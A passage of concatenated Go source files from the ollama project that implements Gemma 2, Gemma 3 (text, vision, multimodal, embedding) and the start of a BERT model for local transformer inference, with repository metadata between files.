package gemma2 import ( "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Options struct { hiddenSize, numHeads, numKVHeads int attnKeyLen, attnValLen int eps, ropeBase, ropeScale float32 attnLogitSoftcap float32 finalLogitSoftcap float32 largeModelScaling bool } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor { return nn.RoPE(ctx, states, positions, o.attnKeyLen, o.ropeBase, 1./o.ropeScale, rope.WithTypeNeoX()) } type Model struct { model.Base model.SentencePiece TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []Layer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` // just set to token_embd? *Options } const ( gemma27BLayerCount = 46 ) func New(c fs.Config) (model.Model, error) { m := Model{ SentencePiece: model.NewSentencePiece( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, ), Layers: make([]Layer, c.Uint("block_count")), Options: &Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), attnKeyLen: int(c.Uint("attention.key_length")), attnValLen: int(c.Uint("attention.value_length")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base", 10000.0), ropeScale: c.Float("rope.scaling.factor", 1.0), attnLogitSoftcap: c.Float("attn_logit_softcapping"), finalLogitSoftcap: c.Float("final_logit_softcapping"), }, } slidingWindowLen := int32(c.Uint("attention.sliding_window")) m.Cache = kvcache.NewWrapperCache(kvcache.NewSWACache(slidingWindowLen, m.Shift), kvcache.NewCausalCache(m.Shift)) m.Cache.SetConfig(ml.CacheConfig{}) return &m, nil } type SelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *SelfAttention) Forward(ctx ml.Context, hiddenState, positionIDs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { batchSize := hiddenState.Dim(1) q := sa.Query.Forward(ctx, hiddenState) q = q.Reshape(ctx, opts.attnKeyLen, opts.numHeads, batchSize) q = opts.applyRotaryPositionEmbeddings(ctx, q, positionIDs) if opts.largeModelScaling { q = q.Scale(ctx, 1.0/math.Sqrt(float64(opts.hiddenSize/opts.numHeads))) } else { q = q.Scale(ctx, 1.0/math.Sqrt(float64(opts.attnKeyLen))) } k := sa.Key.Forward(ctx, hiddenState) k = k.Reshape(ctx, opts.attnKeyLen, opts.numKVHeads, batchSize) k = opts.applyRotaryPositionEmbeddings(ctx, k, positionIDs) v := sa.Value.Forward(ctx, hiddenState) v = v.Reshape(ctx, opts.attnValLen, opts.numKVHeads, batchSize) cache.Put(ctx, k, v) k, v, mask := cache.Get(ctx) q = q.Permute(ctx, 0, 2, 1, 3) k = k.Permute(ctx, 0, 2, 1, 3) v = v.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx) kq := k.Mulmat(ctx, q) // logit softcap kq = kq.Scale(ctx, 1.0/float64(opts.attnLogitSoftcap)) kq = kq.Tanh(ctx) kq = kq.Scale(ctx, float64(opts.attnLogitSoftcap)) kq = kq.Add(ctx, mask) kq = kq.Softmax(ctx) kqv := v.Mulmat(ctx, kq) kqv = kqv.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx) kqv = kqv.Reshape(ctx, opts.attnValLen*opts.numHeads, batchSize) return sa.Output.Forward(ctx, kqv) } func (m *Model) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil } type MLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *MLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *Options) ml.Tensor { hiddenState = mlp.Gate.Forward(ctx, hiddenState).GELU(ctx, mlp.Up.Forward(ctx, hiddenState)) return mlp.Down.Forward(ctx, hiddenState) } type Layer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` SelfAttention *SelfAttention PostAttentionNorm *nn.RMSNorm `gguf:"post_attention_norm"` MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *MLP PostMLPNorm *nn.RMSNorm `gguf:"post_ffw_norm"` } func (l *Layer) Forward(ctx ml.Context, hiddenState, positionIDs, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { residual := hiddenState hiddenState = l.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.SelfAttention.Forward(ctx, hiddenState, positionIDs, cache, opts) hiddenState = l.PostAttentionNorm.Forward(ctx, hiddenState, opts.eps) // In the final layer (outputs != nil), optimize by pruning to just the token positions // we need logits for. if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = l.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.MLP.Forward(ctx, hiddenState, opts) hiddenState = l.PostMLPNorm.Forward(ctx, hiddenState, opts.eps) return hiddenState.Add(ctx, residual) } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenState := m.TokenEmbedding.Forward(ctx, batch.Inputs) hiddenState = hiddenState.Scale(ctx, math.Sqrt(float64(m.Options.hiddenSize))) if len(m.Layers) == gemma27BLayerCount { m.Options.largeModelScaling = true } for i, layer := range m.Layers { cacheType := i % 2 m.Cache.SetLayer(i) wc := m.Cache.(*kvcache.WrapperCache) wc.SetLayerType(cacheType) var lastLayerOutputs ml.Tensor if i == len(m.Layers)-1 { lastLayerOutputs = batch.Outputs } hiddenState = layer.Forward(ctx, hiddenState, positions, lastLayerOutputs, m.Cache, m.Options) } hiddenState = m.OutputNorm.Forward(ctx, hiddenState, m.eps) hiddenState = m.Output.Forward(ctx, hiddenState) // final logit softcap hiddenState = hiddenState.Scale(ctx, 1.0/float64(m.Options.finalLogitSoftcap)) hiddenState = hiddenState.Tanh(ctx) return hiddenState.Scale(ctx, float64(m.Options.finalLogitSoftcap)), nil } func init() { model.Register("gemma2", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3/embed.go
model/models/gemma3/embed.go
package gemma3 import ( "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/pooling" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type embedModel struct { model.Base model.SentencePiece *TextModel poolingType pooling.Type Dense [2]*nn.Linear `gguf:"dense"` } func (m *embedModel) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates := m.TextModel.Forward(ctx, batch, m.Cache) hiddenStates = m.poolingType.Forward(ctx, hiddenStates) for _, dense := range m.Dense { hiddenStates = dense.Forward(ctx, hiddenStates) } hiddenStates = hiddenStates.L2Norm(ctx, 1e-12) return hiddenStates, nil } func newEmbedModel(c fs.Config) (model.Model, error) { m := &embedModel{ SentencePiece: model.NewSentencePiece( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{ int32(c.Uint("tokenizer.ggml.eos_token_id")), int32(c.Uint("tokenizer.ggml.eot_token_id", 106)), }, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, ), TextModel: newTextModel(c), poolingType: pooling.Type(c.Uint("pooling_type", 0)), } return m, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3/process_image.go
model/models/gemma3/process_image.go
package gemma3 import ( "image" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/model/imageproc" ) type ImageProcessor struct { imageSize, patchSize, numChannels int } func newImageProcessor(c fs.Config) ImageProcessor { return ImageProcessor{ imageSize: int(c.Uint("vision.image_size")), patchSize: int(c.Uint("vision.patch_size")), numChannels: int(c.Uint("vision.num_channels")), } } func (p *ImageProcessor) pack(img image.Image, mean, std [3]float32) []float32 { var pixelVals, rVals, gVals, bVals []float32 bounds := img.Bounds() for y := bounds.Min.Y; y < bounds.Max.Y; y++ { for x := bounds.Min.X; x < bounds.Max.X; x++ { c := img.At(x, y) r, g, b, _ := c.RGBA() rVal := float32(r>>8) / 255.0 gVal := float32(g>>8) / 255.0 bVal := float32(b>>8) / 255.0 rVal = (rVal - mean[0]) / std[0] gVal = (gVal - mean[1]) / std[1] bVal = (bVal - mean[2]) / std[2] rVals = append(rVals, rVal) gVals = append(gVals, gVal) bVals = append(bVals, bVal) } } pixelVals = append(pixelVals, rVals...) pixelVals = append(pixelVals, gVals...) pixelVals = append(pixelVals, bVals...) return pixelVals } func (p ImageProcessor) ProcessImage(img image.Image) ([]float32, error) { outputSize := image.Point{p.imageSize, p.imageSize} newImage := imageproc.Composite(img) newImage = imageproc.Resize(newImage, outputSize, imageproc.ResizeBilinear) data := p.pack(newImage, imageproc.ImageNetStandardMean, imageproc.ImageNetStandardSTD) return data, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3/model.go
model/models/gemma3/model.go
package gemma3 import ( "bytes" "image" "math" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.TextProcessor *VisionModel `gguf:"v"` *TextModel *MultiModalProjector `gguf:"mm"` ImageProcessor } var _ model.MultimodalProcessor = (*Model)(nil) type MultiModalProjector struct { SoftEmbNorm *nn.RMSNorm `gguf:"mm_soft_emb_norm"` InputProjection *nn.Linear `gguf:"mm_input_projection"` tokensPerImage int } func (p *MultiModalProjector) Forward(ctx ml.Context, visionOutputs ml.Tensor, imageSize, patchSize int, eps float32) ml.Tensor { l := visionOutputs.Dim(0) visionOutputs = visionOutputs.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) patchesPerImage := imageSize / patchSize visionOutputs = visionOutputs.Reshape(ctx, patchesPerImage, patchesPerImage, l) kernelSize := patchesPerImage / int(math.Sqrt(float64(p.tokensPerImage))) visionOutputs = visionOutputs.AvgPool2D(ctx, kernelSize, kernelSize, 0) visionOutputs = visionOutputs.Reshape(ctx, visionOutputs.Dim(0)*visionOutputs.Dim(1), l) visionOutputs = visionOutputs.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) visionOutputs = p.SoftEmbNorm.Forward(ctx, visionOutputs, eps) // TODO: inputProjection must be transposed since they're incompatible with visionOutputs visionOutputs = p.InputProjection.Weight.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx).Mulmat(ctx, visionOutputs) return visionOutputs } func New(c fs.Config) (model.Model, error) { vocabulary := model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{ int32(c.Uint("tokenizer.ggml.eos_token_id")), }, c.Ints("tokenizer.ggml.eos_token_ids")..., ), } var processor model.TextProcessor switch c.String("tokenizer.ggml.model") { case "gpt2": processor = model.NewBytePairEncoding(&vocabulary) default: // Previous uploads of Gemma 3 on Ollama did not have token 106 // (i.e. "<end_of_turn>") so we need to add in case it's not already present vocabulary.EOS = append(vocabulary.EOS, int32(c.Uint("tokenizer.ggml.eot_token_id", 106))) processor = model.NewSentencePiece(&vocabulary) } m := Model{ TextProcessor: processor, ImageProcessor: newImageProcessor(c), VisionModel: newVisionModel(c), TextModel: newTextModel(c), MultiModalProjector: &MultiModalProjector{ tokensPerImage: int(c.Uint("mm_tokens_per_image", 256)), }, } slidingWindowLen := int32(c.Uint("attention.sliding_window")) m.Cache = kvcache.NewWrapperCache(kvcache.NewSWACache(slidingWindowLen, m.Shift), kvcache.NewCausalCache(m.Shift)) return &m, nil } func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) { if len(m.VisionModel.Layers) == 0 { return nil, model.ErrNoVisionModel } image, _, err := image.Decode(bytes.NewReader(multimodalData)) if err != nil { return nil, err } f32s, err := m.ImageProcessor.ProcessImage(image) if err != nil { return nil, err } pixelValues := ctx.Input().FromFloats(f32s, m.ImageProcessor.imageSize, m.ImageProcessor.imageSize, m.ImageProcessor.numChannels, ) visionOutputs := m.VisionModel.Forward(ctx, pixelValues) visionOutputs = m.MultiModalProjector.Forward(ctx, visionOutputs, m.imageSize, m.patchSize, m.VisionModel.eps) return []input.Multimodal{{Tensor: visionOutputs}}, nil } func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) { var result []*input.Input for _, inp := range inputs { if len(inp.Multimodal) == 0 { result = append(result, inp) } else { inputMultimodal := inp.Multimodal[0].Tensor result = append(result, &input.Input{Token: 108, SameBatch: inputMultimodal.Dim(1) + 3}, // "\n\n" &input.Input{Token: 255999}, // "<start_of_image>"" &input.Input{Multimodal: []input.Multimodal{{Tensor: inputMultimodal}}, MultimodalHash: inp.MultimodalHash}, // image data is on the first placeholder ) // add image token placeholders result = append(result, slices.Repeat([]*input.Input{{Token: 0}}, inputMultimodal.Dim(1)-1)...) result = append(result, &input.Input{Token: 256000}, // <end_of_image> &input.Input{Token: 108}, // "\n\n" ) } } return result, nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenState := m.TextModel.Forward(ctx, batch, m.Cache) hiddenState = m.Output.Forward(ctx, hiddenState) if m.TextConfig.finalLogitSoftcap > 0.0 { hiddenState = hiddenState.Scale(ctx, 1.0/float64(m.TextConfig.finalLogitSoftcap)) hiddenState = hiddenState.Tanh(ctx) hiddenState = hiddenState.Scale(ctx, float64(m.TextConfig.finalLogitSoftcap)) } return hiddenState, nil } func init() { model.Register("gemma3", New) model.Register("gemma3_embed", newEmbedModel) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3/model_vision.go
model/models/gemma3/model_vision.go
package gemma3 import ( "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) var batchSize int = 1 type VisionSelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *VisionSelfAttention) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor { headDim := opts.hiddenSize / opts.numHeads query := sa.Query.Forward(ctx, hiddenState) key := sa.Key.Forward(ctx, hiddenState) value := sa.Value.Forward(ctx, hiddenState) query = query.Reshape(ctx, headDim, opts.numHeads, query.Dim(1), batchSize) key = key.Reshape(ctx, headDim, opts.numHeads, key.Dim(1), batchSize) value = value.Reshape(ctx, headDim, opts.numHeads, value.Dim(1), batchSize) attention := nn.Attention(ctx, query, key, value, 1.0/math.Sqrt(float64(headDim)), nil) attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2), batchSize) hiddenState = sa.Output.Forward(ctx, attention) return hiddenState } type VisionMLP struct { FC1 *nn.Linear `gguf:"fc1"` FC2 *nn.Linear `gguf:"fc2"` } func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor { hiddenState = mlp.FC1.Forward(ctx, hiddenState).GELU(ctx) hiddenState = mlp.FC2.Forward(ctx, hiddenState) return hiddenState } type VisionEncoderLayer struct { LayerNorm1 *nn.LayerNorm `gguf:"layer_norm1"` SelfAttention *VisionSelfAttention LayerNorm2 *nn.LayerNorm `gguf:"layer_norm2"` MLP *VisionMLP `gguf:"mlp"` } func (e *VisionEncoderLayer) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor { residual := hiddenState // self attention hiddenState = e.LayerNorm1.Forward(ctx, hiddenState, opts.eps) hiddenState = e.SelfAttention.Forward(ctx, hiddenState, opts) hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState // feed forward hiddenState = e.LayerNorm2.Forward(ctx, hiddenState, opts.eps) hiddenState = e.MLP.Forward(ctx, hiddenState, opts) return hiddenState.Add(ctx, residual) } type VisionModelOptions struct { hiddenSize, numHeads int imageSize, patchSize int eps float32 } type VisionModel struct { PatchEmbedding *nn.Conv2D `gguf:"patch_embedding"` PositionEmbedding *nn.Embedding `gguf:"position_embedding"` PostLayerNorm *nn.LayerNorm `gguf:"post_layernorm"` Layers []VisionEncoderLayer `gguf:"blk"` *VisionModelOptions } func (m *VisionModel) Forward(ctx ml.Context, pixelValues ml.Tensor) ml.Tensor { numPatches := (m.imageSize / m.patchSize) * (m.imageSize / m.patchSize) hiddenState := m.PatchEmbedding.Forward(ctx, pixelValues, m.patchSize, m.patchSize, 0, 0, 1, 1) hiddenState = hiddenState.Reshape(ctx, numPatches, m.hiddenSize) hiddenState = hiddenState.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) positionIDs := ctx.Arange(0, float32(numPatches), 1, ml.DTypeI32) hiddenState = hiddenState.Add(ctx, m.PositionEmbedding.Forward(ctx, positionIDs)) for _, layer := range m.Layers { hiddenState = layer.Forward(ctx, hiddenState, m.VisionModelOptions) } hiddenState = m.PostLayerNorm.Forward(ctx, hiddenState, m.eps) return hiddenState } func newVisionModel(c fs.Config) *VisionModel { return &VisionModel{ Layers: make([]VisionEncoderLayer, c.Uint("vision.block_count")), VisionModelOptions: &VisionModelOptions{ hiddenSize: int(c.Uint("vision.embedding_length")), numHeads: int(c.Uint("vision.attention.head_count")), imageSize: int(c.Uint("vision.image_size")), patchSize: int(c.Uint("vision.patch_size")), eps: c.Float("vision.attention.layer_norm_epsilon"), }, } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3/model_text.go
model/models/gemma3/model_text.go
package gemma3 import ( "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model/input" ) type TextConfig struct { hiddenSize, contextLength, numHeads, numKVHeads int attnKeyLen, attnValLen int eps, ropeScale float32 ropeLocalBase float32 largeModelScaling bool slidingWindow uint32 slidingWindowPattern []bool ropeBase float32 ropeType string ropeOriginalContext int ropeExtrapolation float32 ropeBetaFast float32 ropeBetaSlow float32 finalLogitSoftcap float32 } func (o TextConfig) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor, base, scale float32) ml.Tensor { ropeOpts := []func(*rope.Options){rope.WithTypeNeoX()} if o.ropeType == "yarn" { attnFactor := float32(1.0 / (1.0 + 0.1*math.Log(float64(scale)))) ropeOpts = append(ropeOpts, rope.WithOriginalContextLength(o.ropeOriginalContext), rope.WithExtrapolationFactor(o.ropeExtrapolation), rope.WithAttentionFactor(attnFactor), rope.WithBetaFast(o.ropeBetaFast), rope.WithBetaSlow(o.ropeBetaSlow), ) } return nn.RoPE(ctx, states, positions, o.attnKeyLen, base, 1./scale, ropeOpts...) } type TextModel struct { TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []TextLayer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` *TextConfig } const ( gemmaGlobalCacheCount = 6 gemma1BLayerCount = 26 gemma4BLayerCount = 34 gemma12BLayerCount = 48 gemma27BLayerCount = 62 ) const ( cacheTypeSWA = iota cacheTypeCausal ) func newTextModel(c fs.Config) *TextModel { numBlocks := int(c.Uint("block_count")) m := TextModel{ Layers: make([]TextLayer, numBlocks), TextConfig: &TextConfig{ hiddenSize: int(c.Uint("embedding_length")), contextLength: int(c.Uint("context_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), attnKeyLen: int(c.Uint("attention.key_length", 256)), attnValLen: int(c.Uint("attention.value_length", 256)), eps: c.Float("attention.layer_norm_rms_epsilon", 1e-06), ropeLocalBase: c.Float("rope.local.freq_base", 10000.0), ropeBase: c.Float("rope.freq_base", 1000000.0), slidingWindow: c.Uint("attention.sliding_window"), slidingWindowPattern: c.Bools("attention.sliding_window_pattern"), ropeType: c.String("rope.scaling.type"), ropeOriginalContext: int(c.Uint("rope.scaling.original_context_length")), ropeExtrapolation: c.Float("rope.scaling.extrapolation_factor", 1.0), ropeBetaFast: c.Float("rope.scaling.beta_fast", 64.0), ropeBetaSlow: c.Float("rope.scaling.beta_slow", 1.0), ropeScale: c.Float("rope.scaling.factor", 1.0), finalLogitSoftcap: c.Float("final_logit_softcapping", 0.0), }, } // Apply corrections for older versions of the Gemma 3 models // by looking at whether they use sliding window attention and // based on their layer counts. if m.TextConfig.slidingWindow < uint32(m.TextConfig.contextLength) { switch numBlocks { case gemma1BLayerCount: // The 1B model has final logit softcapping set to 30.0 // but it should be 0.0 m.TextConfig.finalLogitSoftcap = 0.0 case gemma4BLayerCount, gemma12BLayerCount, gemma27BLayerCount: // The 4B, 12B, and 27B models have rope scale unset // but it shuold be set to 8.0 m.TextConfig.ropeScale = 8.0 } } if numBlocks == gemma27BLayerCount { m.largeModelScaling = true } return &m } type TextSelfAttention struct { Query *nn.Linear `gguf:"attn_q"` QueryNorm *nn.RMSNorm `gguf:"attn_q_norm"` Key *nn.Linear `gguf:"attn_k"` KeyNorm *nn.RMSNorm `gguf:"attn_k_norm"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (opts *TextConfig) ropeValuesForLayer(layer int) (base float32, scale float32) { if opts.slidingWindowPattern != nil && opts.slidingWindowPattern[layer] { return opts.ropeLocalBase, 1.0 } // Standard Gemma3: only every n-th layer is global, // where n = gemmaGlobalCacheCount, otherwise use // the local rope base if (layer+1)%gemmaGlobalCacheCount > 0 { return opts.ropeLocalBase, 1.0 } // default to global rope base return opts.ropeBase, opts.ropeScale } func (sa *TextSelfAttention) Forward(ctx ml.Context, layer int, hiddenState, positionIDs ml.Tensor, cache kvcache.Cache, opts *TextConfig) ml.Tensor { batchSize := hiddenState.Dim(1) ropeBase, ropeScale := opts.ropeValuesForLayer(layer) q := sa.Query.Forward(ctx, hiddenState) q = q.Reshape(ctx, opts.attnKeyLen, opts.numHeads, batchSize) q = sa.QueryNorm.Forward(ctx, q, opts.eps) q = opts.applyRotaryPositionEmbeddings(ctx, q, positionIDs, ropeBase, ropeScale) if opts.largeModelScaling { q = q.Scale(ctx, 1.0/math.Sqrt(float64(opts.hiddenSize/opts.numHeads))) } else { q = q.Scale(ctx, 1.0/math.Sqrt(float64(opts.attnKeyLen))) } k := sa.Key.Forward(ctx, hiddenState) k = k.Reshape(ctx, opts.attnKeyLen, opts.numKVHeads, batchSize) k = sa.KeyNorm.Forward(ctx, k, opts.eps) k = opts.applyRotaryPositionEmbeddings(ctx, k, positionIDs, ropeBase, ropeScale) v := sa.Value.Forward(ctx, hiddenState) v = v.Reshape(ctx, opts.attnValLen, opts.numKVHeads, batchSize) scaleFactor := 1.0 kqv := nn.Attention(ctx, q, k, v, scaleFactor, cache) kqv = kqv.Reshape(ctx, opts.attnValLen*opts.numHeads, batchSize) return sa.Output.Forward(ctx, kqv) } func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { ropeBase, ropeScale := m.TextConfig.ropeValuesForLayer(layer) return m.applyRotaryPositionEmbeddings(ctx, key, shift, ropeBase, ropeScale), nil } type TextMLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *TextMLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *TextConfig) ml.Tensor { hiddenState = mlp.Gate.Forward(ctx, hiddenState).GELU(ctx, mlp.Up.Forward(ctx, hiddenState)) return mlp.Down.Forward(ctx, hiddenState) } type TextLayer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` SelfAttention *TextSelfAttention PostAttentionNorm *nn.RMSNorm `gguf:"post_attention_norm"` MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *TextMLP PostMLPNorm *nn.RMSNorm `gguf:"post_ffw_norm"` } func (l *TextLayer) Forward(ctx ml.Context, layer int, hiddenState, positionIDs, outputs ml.Tensor, cache kvcache.Cache, opts *TextConfig) ml.Tensor { residual := hiddenState hiddenState = l.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.SelfAttention.Forward(ctx, layer, hiddenState, positionIDs, cache, opts) hiddenState = l.PostAttentionNorm.Forward(ctx, hiddenState, opts.eps) // In the final layer (outputs != nil), optimize by pruning to just the token positions // we need logits for. if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = l.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.MLP.Forward(ctx, hiddenState, opts) hiddenState = l.PostMLPNorm.Forward(ctx, hiddenState, opts.eps) return hiddenState.Add(ctx, residual) } func (m *TextModel) Forward(ctx ml.Context, batch input.Batch, cache kvcache.Cache) ml.Tensor { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenState := m.TokenEmbedding.Forward(ctx, batch.Inputs) hiddenState = hiddenState.Scale(ctx, math.Sqrt(float64(m.TextConfig.hiddenSize))) // set image embeddings var except []int for _, image := range batch.Multimodal { visionOutputs := image.Multimodal[0].Tensor ctx.Forward(visionOutputs.Copy(ctx, hiddenState.View(ctx, image.Index*hiddenState.Stride(1), visionOutputs.Dim(0)*visionOutputs.Dim(1)))) for i := range visionOutputs.Dim(1) { except = append(except, image.Index+i) } } for i, layer := range m.Layers { // gemma alternates between the sliding window (local) and causal (global) // kv cache every 6 layers if cache != nil { cacheType := cacheTypeSWA if (i+1)%gemmaGlobalCacheCount == 0 { cacheType = cacheTypeCausal } cache.SetLayer(i) wc := cache.(*kvcache.WrapperCache) wc.SetLayerType(cacheType) if causal, ok := wc.UnderlyingCache().(*kvcache.Causal); ok { causal.SetCausal(ctx, kvcache.CausalOptions{Except: except}) } } var lastLayerOutputs ml.Tensor if i == len(m.Layers)-1 { lastLayerOutputs = batch.Outputs } hiddenState = layer.Forward(ctx, i, hiddenState, positions, lastLayerOutputs, cache, m.TextConfig) } return m.OutputNorm.Forward(ctx, hiddenState, m.eps) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/bert/embed.go
model/models/bert/embed.go
package bert import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/pooling" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.TextProcessor TokenEmbedding *nn.Embedding `gguf:"token_embd"` TypeEmbedding *nn.Embedding `gguf:"token_types"` PositionEmbedding *nn.Embedding `gguf:"position_embd"` TokenEmbeddingNorm *nn.LayerNorm `gguf:"token_embd_norm"` Layers []EncoderLayer `gguf:"blk"` Options } // Forward implements model.Model. func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) hiddenStates = hiddenStates.Add(ctx, m.TypeEmbedding.Weight.Slice(ctx, 1, 0, 1, 1)) hiddenStates = hiddenStates.Add(ctx, m.PositionEmbedding.Forward(ctx, ctx.Input().FromInts(batch.Positions, len(batch.Positions)))) hiddenStates = m.TokenEmbeddingNorm.Forward(ctx, hiddenStates, 